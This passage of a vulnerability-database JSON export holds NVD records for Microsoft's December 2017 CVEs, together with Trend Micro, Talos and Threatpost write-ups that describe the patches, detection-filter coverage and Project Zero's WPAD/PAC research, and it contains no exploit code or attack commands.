"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11885", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:24", "description": "Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how Microsoft Edge handles objects in memory, aka \"Microsoft Edge Memory Corruption Vulnerability\".", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11888", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2017-11888"], "modified": "2017-12-29T14:39:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11888", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11888", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:28", "description": "Device Guard in Windows 10 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allows a security feature bypass vulnerability due to the way untrusted files are handled, aka \"Microsoft Windows Security Feature Bypass Vulnerability\".", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11899", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11899"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2016:1709", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1607", 
"cpe:/o:microsoft:windows_10:-"], "id": "CVE-2017-11899", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11899", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*"]}], "trendmicroblog": [{"lastseen": "2018-01-09T09:54:31", "description": "\n\nIf you read my weekly blog or follow me on [Twitter](<https://twitter.com/elisal>), you know that I\u2019m a huge sports fan. Unfortunately, when you don\u2019t live in the town of your favorite team, you can be subject to blackout rules. So, my husband and I decided to purchase NFL Sunday Ticket from DirecTV. Fast forward to a couple of years ago \u2013 I wanted to watch my team play, but the channel that the game was supposed to be on was showing another game featuring my least favorite team instead. Needless to say, I was a little upset. I called DirecTV and I wasn\u2019t shy about my feelings on the situation. The customer service representative put me on hold to figure out the problem. Why wasn\u2019t I able to see my game? The game was already over. I\u2019m sure the team at DirecTV had a big laugh over my mistake, but I owned up to it and apologized to the representative.\n\nWhen a vulnerability is submitted to the Zero Day Initiative (ZDI), the affected vendor is given 120 days to take action to patch the vulnerability. If the deadline is not met, the ZDI will publicly disclose the vulnerability in accordance with its disclosure policy. Earlier this week, the Zero Day Initiative (ZDI) published a zero-day vulnerability as a result of a vendor not patching a vulnerability. 
One of our internal researchers, [Ricky Lawshae](<https://twitter.com/HeadlessZeke>), submitted a vulnerability to the Zero Day Initiative in mid-June of this year involving equipment that DirecTV uses with its Wireless Genie devices. The affected equipment is a Linksys WVBR0-25 which is used as a wireless video bridge. Ricky reviewed the scripts running on the Linksys device and found one that he could use to inject additional commands. He was able to implement a root shell on the box in less than 30 seconds by exploiting this command injection vulnerability, which ultimately granted him full remote unauthenticated administrator control over the device. The ZDI attempted to contact the vendor several times regarding the vulnerability but never received a reply. The ZDI informed Linksys that the vulnerability would be published on December 12, 2017. You can read [Ricky\u2019s blog](<https://www.zerodayinitiative.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair>) to get more details on this vulnerability as well as view a video of the exploit in action.\n\n**Microsoft Update**\n\nThis week\u2019s Digital Vaccine\u00ae (DV) package includes coverage for Microsoft updates released on or before December 12, 2017. Security patches were released by Microsoft covering Internet Explorer (IE), Edge, Windows, Office, SharePoint, and Exchange. Three of the Microsoft CVEs came through the ZDI program. The following table maps Digital Vaccine filters to the Microsoft updates. Filters marked with an asterisk (*) shipped prior to this DV package, providing preemptive zero-day protection for customers. 
You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [December 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/12/12/the-december-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-11885 | 30092 | \nCVE-2017-11886 | 30069 | \nCVE-2017-11887 | 20792 | \nCVE-2017-11888 | 30070 | \nCVE-2017-11889 | 30075 | \nCVE-2017-11890 | 30068 | \nCVE-2017-11893 | 30076 | \nCVE-2017-11894 | 30077 | \nCVE-2017-11895 | 30078 | \nCVE-2017-11899 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11901 | *29900 | \nCVE-2017-11903 | 30079 | \nCVE-2017-11905 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11906 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11907 | 30081 | \nCVE-2017-11908 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11909 | 30082 | \nCVE-2017-11910 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11911 | 30083 | \nCVE-2017-11912 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11913 | *29786 | \nCVE-2017-11914 | 30080 | \nCVE-2017-11916 | 30085 | \nCVE-2017-11918 | 30074 | \nCVE-2017-11919 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11927 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11930 | 30086 | \nCVE-2017-11932 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11934 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11935 | 30088 | \nCVE-2017-11936 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11937 | 30093 | \nCVE-2017-11939 | | Vendor Deemed Reproducibility or Exploitation Unlikely \n \n \n\n**End of Support Bulletin**\n\nEarlier this week, we announced the end of support for a number of TippingPoint software releases across various models.\n\nDate of 
Announcement: December 12, 2017\n\n \n\nAffected IPS (N/NX-Series) TOS Versions: 3.7.0, 3.7.1, 3.7.2, 3.8.0, 3.8.1, 3.8.2, 3.8.3, 3.9.0, 3.9.1\n\nEnd of Engineering: March 31, 2018\n\nEnd of Support: December 31, 2018\n\n \n\nAffected IPS (S-Series) TOS Versions: 3.6.4, 3.6.5, 3.6.6\n\nEnd of Engineering: March 31, 2018\n\nEnd of Support: December 31, 2018\n\n \n\nAffected TPS TOS Versions: 4.0.2, 4.1.0, 4.1.1, 4.1.2, 4.2.0\n\nEnd of Engineering: March 31, 2018\n\nEnd of Support: December 31, 2018\n\n \n\nAffected SMS TOS Versions: 4.4.0\n\nEnd of Engineering: March 31, 2018\n\nEnd of Support: December 31, 2018\n\n \n\nFactory Release of TPS 5.0.0: October 16, 2017\n\nFactory Release of SMS 5.0.0: March 31, 2018\n\nFactory Release of IPS 3.8.4: March 31, 2018\n\nCustomers with any questions or need assistance with migration planning can contact the TippingPoint Technical Assistance Center. Release notes are also available on <https://tmc.tippingpoint.com>.\n\n**Zero-Day Filters**\n\nThere are no new zero-day filters in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. 
You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**Updated Existing Zero-Day Filters**\n\nThis section highlights specific filter(s) of interest in this week\u2019s Digital Vaccine package that have been updated as a result of a vendor either issuing a patch for a vulnerability found via the Zero Day Initiative or a vulnerability that has been published by the Zero Day Initiative in accordance with its Disclosure Policy.\n\nThis week\u2019s updated zero-day filters focus on two of the vulnerabilities from this month\u2019s Microsoft update. The updated filters reflect the fact that the vulnerabilities have been published because Microsoft has issued patches for them. The date in parentheses after each filter reflects the date we had protection in place for our customers:\n\n**_Microsoft (2)_**\n\n\u2022 29900: HTTP: Microsoft Chakra Javascript Array JIT Optimization Type Confusion Vulnerability (November 7, 2017)\n\n\u2022 29786: HTTP: Microsoft Windows VBScript VT_BSTR Use-After-Free Vulnerability (October 24, 2017)\n\n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-december-4-2017/>).", "cvss3": {}, "published": "2017-12-15T16:06:45", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of December 11, 2017", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11899", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", 
"CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930", "CVE-2017-11932", "CVE-2017-11934", "CVE-2017-11935", "CVE-2017-11936", "CVE-2017-11937", "CVE-2017-11939"], "modified": "2017-12-15T16:06:45", "id": "TRENDMICROBLOG:83CF76ED2F779A162F6FE7688839D2BF", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-december-11-2017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "talosblog": [{"lastseen": "2018-01-29T19:59:50", "description": "Today, Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 34 new vulnerabilities with 21 of them rated critical and 13 of them rated important. These vulnerabilities impact Edge, Exchange, Internet Explorer, Office, Scripting Engine, Windows, and more. \n \nIn addition to the 33 vulnerabilities addressed, Microsoft has also released an update for Microsoft Office which improves security by disabling the Dynamic Data Exchange (DDE) protocol. This update is detailed in [ADV170021](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170021>) and impacts all supported versions of Office. Organizations who are unable to install this update should consult the advisory for workaround that help mitigate DDE exploitation attempts. 
\n \n\n\n## Vulnerabilities Rated Critical\n\n \nMicrosoft has assigned the following vulnerabilities a Critical severity rating: \n \n\n\n * [CVE-2017-11886 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11886>)\n * [CVE-2017-11888 - Microsoft Edge Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11888>)\n * [CVE-2017-11889 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11889>)\n * [CVE-2017-11890 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11890>)\n * [CVE-2017-11893 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11893>)\n * [CVE-2017-11894 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11894>)\n * [CVE-2017-11895 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11895>)\n * [CVE-2017-11901 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11901>)\n * [CVE-2017-11903 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11903>)\n * [CVE-2017-11905 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11905>)\n * [CVE-2017-11907 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11907>)\n * [CVE-2017-11908 - Scripting Engine Memory Corruption 
Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11908>)\n * [CVE-2017-11909 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11909>)\n * [CVE-2017-11910 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11910>)\n * [CVE-2017-11911 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11911>)\n * [CVE-2017-11912 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11912>)\n * [CVE-2017-11914 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11914>)\n * [CVE-2017-11918 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11918>)\n * [CVE-2017-11930 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11930>)\n * [CVE-2017-11937 - Microsoft Malware Protection Engine Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11937>)\n * [CVE-2017-11940 - Microsoft Malware Protection Engine Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11940>)\n \n \nThe following is a brief description of each vulnerability. \n \n\n\n### Multiple CVEs - Scripting Engine Memory Corruption Vulnerability\n\n \nMultiple vulnerabilities have been identified in the scripting engines of Edge and Internet Explorer that could allow an attacker to remotely execute arbitrary code. 
These vulnerabilities all manifest due to the scripting engines in Edge and Internet Explorer improperly handling objects in memory. As a result, successful exploitation could lead to arbitrary code execution in the context of the current user. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit these vulnerabilities or, in some cases, opens a Microsoft Office document containing an embedded ActiveX control marked \"safe for initialization.\" \n \nThe following is a list of CVEs related to these vulnerabilities: \n \n\n\n * CVE-2017-11886\n * CVE-2017-11889\n * CVE-2017-11890\n * CVE-2017-11893\n * CVE-2017-11894\n * CVE-2017-11895\n * CVE-2017-11901\n * CVE-2017-11903\n * CVE-2017-11905\n * CVE-2017-11907\n * CVE-2017-11908\n * CVE-2017-11909\n * CVE-2017-11910\n * CVE-2017-11911\n * CVE-2017-11912\n * CVE-2017-11914\n * CVE-2017-11918\n * CVE-2017-11930\n \n \n\n\n### CVE-2017-11888 - Microsoft Edge Memory Corruption Vulnerability\n\n \nA vulnerability has been identified in the scripting engines of Edge and Internet Explorer that could allow an attacker to remotely execute arbitrary code. This vulnerability manifests due to the scripting engines in Edge and Internet Explorer improperly handling objects in memory. As a result, successful exploitation could lead to arbitrary code execution in the context of the current user. Users could be exploited if they navigate to a malicious web page designed to exploit these vulnerabilities. \n \n\n\n### Multiple CVEs - Microsoft Malware Protection Engine Remote Code Execution Vulnerability\n\n \nTwo arbitrary code execution vulnerabilities have been identified within the Microsoft Malware Protection Engine that could allow an attacker to execute code in the context of the LocalSystem account. These vulnerabilities manifest as a result of the engine improperly scanning files. 
Exploitation of these vulnerabilities is achievable if the system scans a specially crafted file with an affected version of the Microsoft Malware Protection Engine. Note that these updates typically will not require action by users or administrators as the built-in mechanism for automatic deployment of these updates will account within 48 hours of release. \n \n\n\n * CVE-2017-11937\n * CVE-2017-11940\n \n\n\n## Vulnerabilities Rated Important\n\n \nMicrosoft has assigned the following vulnerabilities an Important severity rating: \n \n\n\n * [CVE-2017-11885 - Windows RRAS Service Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885>)\n * [CVE-2017-11887 - Scripting Engine Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11887>)\n * [CVE-2017-11899 - Microsoft Windows Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11899>)\n * [CVE-2017-11906 - Scripting Engine Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11906>)\n * [CVE-2017-11913 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11913>)\n * [CVE-2017-11916 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11916>)\n * [CVE-2017-11919 - Scripting Engine Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11919>)\n * [CVE-2017-11927 - Microsoft Windows Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11927>)\n * [CVE-2017-11932 - Microsoft Exchange Spoofing Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11932>)\n * 
[CVE-2017-11934 - Microsoft PowerPoint Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11934>)\n * [CVE-2017-11935 - Microsoft Excel Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11935>)\n * [CVE-2017-11936 - Microsoft SharePoint Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11936>)\n * [CVE-2017-11939 - Microsoft Office Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11939>)\n \n \nThe following is a brief description of each vulnerability. \n \n\n\n### CVE-2017-11885 - Windows RRAS Service Remote Code Execution Vulnerability\n\n \nA vulnerability has been identified that exists in RPC on systems where Routing and Remote Access is enabled. Successful exploitation of this vulnerability could result in code execution. In order to exploit this vulnerability, an attacker would need to run an application specifically designed to exploit this vulnerability. Routing and Remote Access is not enabled in default configurations of Windows. On systems where Routing and Remote Access is disabled, the system is not vulnerable. \n \n\n\n### Multiple CVEs - Scripting Engine Information Disclosure Vulnerability\n\n \nMultiple vulnerabilities have been identified in the scripting engines of Edge and Internet Explorer that could allow an attacker to obtain information to further compromise a user's system. These vulnerabilities all manifest due to the scripting engine improperly handling objects in memory. Successful exploitation would give an attacker sensitive information that could then be used in other exploits. Scenarios where users could be exploited include web-based attacks, where a user navigates to a malicious web page designed to exploit one of these vulnerabilities. 
\n \nThe following is a list of CVEs related to these vulnerabilities: \n \n\n\n * CVE-2017-11887\n * CVE-2017-11906\n * CVE-2017-11919\n \n \n\n\n### CVE-2017-11899 - Microsoft Windows Security Feature Bypass Vulnerability\n\n \nA vulnerability has been identified that affects Device Guard. Successful exploitation of this vulnerability could result in Device Guard incorrectly validating untrusted files. As Device Guard uses signatures to determine whether a file is benign or malicious, this could cause Device Guard to allow a malicious file to execute on vulnerable systems. An attacker could leverage this vulnerability to cause an untrusted file to appear as if it is trusted. \n \n\n\n### Multiple CVEs - Scripting Engine Memory Corruption Vulnerability\n\n \nMultiple vulnerabilities have been identified in the scripting engines of Edge and Internet Explorer that could allow an attacker to remotely execute arbitrary code. These vulnerabilities all manifest due to the scripting engines in Edge and Internet Explorer improperly handling objects in memory. As a result, successful exploitation could lead to arbitrary code execution in the context of the current user. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit these vulnerabilities or, in some cases, opens a Microsoft Office document containing an embedded ActiveX control marked \"safe for initialization.\" \n \nThe following is a list of CVEs related to these vulnerabilities: \n \n\n\n * CVE-2017-11913\n * CVE-2017-11916\n \n \n\n\n### CVE-2017-11927 - Microsoft Windows Information Disclosure Vulnerability\n\n \nAn information disclosure vulnerability has been identified that affects the Windows its:// protocol handler. 
This vulnerability manifests due to the protocol handler sending network traffic to a remote site when determining the zone associated with a URL that is provided to the protocol handler. An attacker could attempt to leverage this vulnerability to obtain sensitive information. This vulnerability could be leveraged to obtain NTLM hash values associated with a victim's account. \n \n\n\n### CVE-2017-11932 - Microsoft Exchange Spoofing Vulnerability\n\n \nA spoofing vulnerability has been identified that affects Microsoft Exchange. This vulnerability manifests due to Outlook Web Access (OWA) failing to properly handle certain web requests. This vulnerability could be leveraged by attackers to inject scripts and content. This vulnerability could also be leveraged to redirect clients to a malicious web site. Successful exploitation of this vulnerability would require an attacker to send victims a specially crafted email containing a malicious link. \n \n\n\n### CVE-2017-11934 - Microsoft PowerPoint Information Disclosure Vulnerability\n\n \nAn information disclosure vulnerability has been identified that affects Microsoft Office. This vulnerability manifests due to Microsoft Office improperly disclosing contents in memory. This vulnerability could be leveraged by an attacker to obtain sensitive information that could be used to launch additional attacks against a target system. Successful exploitation of this vulnerability would require an attacker to send a specially crafted file to a victim and convince them to open the file. \n \n\n\n### CVE-2017-11935 - Microsoft Excel Remote Code Execution Vulnerability\n\n \nAn arbitrary code execution vulnerability has been identified in Microsoft Excel which manifests as a result of improperly handling objects in memory. An attacker could exploit this vulnerability by creating a specially crafted Excel document which triggers the vulnerability. 
Successful exploitation would allow an attacker to execute arbitrary code in the context of the current user. Scenarios where this could occur include email-based attacks or attacks where users download malicious files off of a site hosting user-created content (DropBox, OneDrive, Google Drive). \n \n\n\n### CVE-2017-11936 - Microsoft SharePoint Elevation of Privilege Vulnerability\n\n \nA privilege escalation vulnerability has been identified in Microsoft SharePoint Server that could potentially allow an attacker to impersonate a user and perform restricted actions. This vulnerability manifests due to SharePoint improperly sanitizing specially crafted web requests. An authenticated user who exploits this vulnerability could proceed to perform a cross-site scripting attack to cause other users to execute arbitrary JavaScript in the context of that user. This could then allow an attacker to read content, change permissions, or inject other malicious content on behalf of that user if permitted. \n \n\n\n### CVE-2017-11939 - Microsoft Office Information Disclosure Vulnerability\n\n \nAn information disclosure vulnerability has been identified in Microsoft Office that could leak a user's private key. This vulnerability manifests as a result of Visual Basic macros in Office incorrectly exporting a user's private key from the certificate store while saving a document. Note that an attacker would need to exploit another vulnerability or socially engineer the user to obtain the document containing the leaked private key in order to leverage it. \n \n\n\n## Coverage\n\n \nIn response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. 
Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. \n \nSnort Rules: \n \n\n\n * 37283-37284, 45121-45124, 45128-40133, 45138-45153, 45155-45156, 45160-45163, 45167-45170.\n\n", "cvss3": {}, "published": "2017-12-12T15:32:00", "type": "talosblog", "title": "Microsoft Patch Tuesday - December 2017", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11899", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930", "CVE-2017-11932", "CVE-2017-11934", "CVE-2017-11935", "CVE-2017-11936", "CVE-2017-11937", "CVE-2017-11939", "CVE-2017-11940"], "modified": "2017-12-12T23:32:56", "id": "TALOSBLOG:C29A5D06DFA4855828033CE3321D48DE", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/1A84Sx13xAc/ms-tuesday.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2019-01-23T05:28:01", "description": "Google\u2019s Project Zero released details of a local proof-of-concept attack against a fully patched Windows 10 PC that allows an adversary to execute untrusted JavaScript outside a sandboxed environment on targeted systems.\n\nThe attack is a variation of a WPAD/PAC attack. 
In Project Zero\u2019s case, the WPAD/PAC attack focuses on chaining several vulnerabilities together relating to the PAC and a Microsoft JScript.dll file in order to gain remote command execution on a victim\u2019s machine.\n\n\u201cWe identified 7 security vulnerabilities in (JScript.dll) and successfully demonstrated reliable code execution from local network (and beyond) against a fully patched (at the time of writing) Windows 10 64-bit with Fall Creators Update installed,\u201d wrote Project Zero researchers [on the team\u2019s website](<https://googleprojectzero.blogspot.com/2017/12/apacolypse-now-exploiting-windows-10-in_18.html>) Monday.\n\nThe vulnerabilities have since been patched.\n\nWeb Proxy AutoDiscovery (WPAD) protocol attacks are tied to how browsers use PAC (Proxy Auto-Configuration) to navigate HTTP and HTTPS requests. PAC files contain JavaScript that specifies which proxy a browser needs to use to get to a specific URL. If a malicious PAC is introduced to the browser, that allows an attacker to monitor the URL of every request the browser makes.\n\nPrevious researchers have found holes in WPAD ranging from an \u201c[UNHOLY PAC](<https://threatpost.com/wpad-flaws-leak-https-urls/119582/>)\u201d attack identified by SafeBreach to a [man-in-the-middle attack technique](<https://www.contextis.com/blog/leaking-https-urls-20-year-old-vulnerability>) 